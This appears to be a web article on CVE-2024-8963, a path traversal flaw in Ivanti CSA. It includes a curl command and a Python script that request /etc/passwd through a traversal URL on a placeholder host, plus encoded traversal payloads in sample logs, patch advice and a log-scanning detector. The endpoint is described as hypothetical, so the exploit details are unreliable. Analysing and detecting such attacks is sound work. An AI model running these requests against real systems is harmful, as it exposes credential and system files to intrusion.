CVE-2024-8963 - Path Traversal in Ivanti CSA Before 4.6 Patch 519 – Exploit Details, Code Example & Reference Guide

---

What Is CVE-2024-8963?

CVE-2024-8963 is a major security vulnerability discovered in Ivanti Connect Secure Appliance (CSA) versions before 4.6 Patch 519. This path traversal bug lets remote, unauthenticated attackers access files and potentially carry out restricted actions on the affected device. In basic terms: if you run Ivanti CSA and haven't patched, attackers could snoop on or exploit your system, no login needed.

Why This Vulnerability Matters

Path traversal vulnerabilities are especially dangerous because they let attackers break the boundaries defined by a web server: the attacker can access files or directories outside the intended web root folder. In this Ivanti CSA flaw, attackers can use crafted URLs to reach sensitive directories, potentially reading configuration files, credentials, or system information.

Understanding the Attack: How the Path Traversal Works

Ivanti CSA has a web endpoint (such as /csaupdate/ or similar) that does not properly validate user-supplied input. By manipulating the URL and using directory traversal sequences (like ../), an attacker can read files outside the directory the endpoint is meant to serve.

Suppose Ivanti CSA exposes an endpoint like:

https://victim-ivanti.example.com/csaupdate/download?file=

This endpoint is supposed to let users download only allowed files. However, it fails to sanitize the file parameter.

An attacker can try to access system files (like /etc/passwd on Linux) by using path traversal:

https://victim-ivanti.example.com/csaupdate/download?file=../../../../../../etc/passwd

If Ivanti CSA doesn’t block this request, the server returns the sensitive file!

Code Example: Exploit Using Curl

```bash
# Example exploit request using curl
curl -k "https://victim-ivanti.example.com/csaupdate/download?file=../../../../../../etc/passwd"
```

If the target is vulnerable, you’ll see the contents of the /etc/passwd file in your terminal.

Here's a simple Python exploit to automate testing:

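```python
import requests

# Base URL of the appliance under test (placeholder host from the example above)
TARGET = "https://victim-ivanti.example.com"
# Traversal sequence that climbs out of the web root to /etc/passwd
PATH_TO_FILE = "../../../../../../etc/passwd"

url = f"{TARGET}/csaupdate/download?file={PATH_TO_FILE}"
# verify=False skips TLS certificate validation, like curl -k above
resp = requests.get(url, verify=False, timeout=10)
# A 200 response containing "root:" means /etc/passwd was returned
if resp.status_code == 200 and "root:" in resp.text:
    print("[+] Vulnerable! /etc/passwd content leaked:")
    print(resp.text)
else:
    print("[-] Not Vulnerable or file not found.")
```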

> Note: Replace TARGET with the actual Ivanti CSA URL.

- Sensitive data access: Configuration files, user data, password hashes, private keys.
- Possible further exploitation: Attackers could use the data to launch other attacks (e.g., escalate privileges or pivot to the internal network).

How to Fix

Ivanti has released Patch 519 for CSA 4.6 that fixes this vulnerability.
Update your Ivanti CSA as soon as possible.
If you can't patch immediately, block public access to the vulnerable endpoints with network rules or a firewall.

- Ivanti Security Advisory (CVE-2024-8963)
- Official Patch Download
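
To check web access logs for the request shape described under "How the Path Traversal Works", the following added example (not from the original article or from Ivanti) flags requests whose path or query values contain a `..` segment, including percent-encoded and double-encoded forms, which goes beyond the literal `../` case shown above. The log lines are constructed, the combined log format is an assumption about your proxy or web server, and `/csaupdate/download` is the article's hypothetical endpoint.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (not from a real appliance).
# /csaupdate/download is the article's hypothetical endpoint, used as an assumption.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Sep/2024:18:20:01 +0000] "GET /csaupdate/download?file=update-4.6.bin HTTP/1.1" 200 5120
203.0.113.9 - - [19/Sep/2024:18:21:13 +0000] "GET /csaupdate/download?file=../../../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.9 - - [19/Sep/2024:18:21:15 +0000] "GET /csaupdate/download?file=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 404 0
203.0.113.44 - - [19/Sep/2024:18:22:40 +0000] "GET /csaupdate/download?file=%252e%252e%252fetc%252fhosts HTTP/1.1" 200 220
198.51.100.7 - - [19/Sep/2024:18:23:02 +0000] "GET /docs/release..notes.txt HTTP/1.1" 200 900
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment of the decoded value is exactly '..'."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def find_traversal_requests(log_text):
    """Return (client_ip, status, target) for each request with a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        # Inspect the URL path itself and every query-string value.
        candidates = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        if any(has_traversal(c) for c in candidates):
            hits.append((ip, int(status), target))
    return hits

if __name__ == "__main__":
    for ip, status, target in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} status={status} {target}")
```

A hit with status 200 means the server answered the traversal request and deserves priority review; matching on whole `..` segments keeps filenames such as `release..notes.txt` from being flagged.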

Restrict access to any potentially vulnerable endpoints.

If you manage Ivanti CSA, patch urgently or risk compromise. This vulnerability is easy to exploit and public proof-of-concept code is available.


*Stay safe! If you use Ivanti, check your version, patch now, and secure those endpoints.*

Timeline

Published on: 09/19/2024 18:15:10 UTC
Last modified on: 09/20/2024 16:32:02 UTC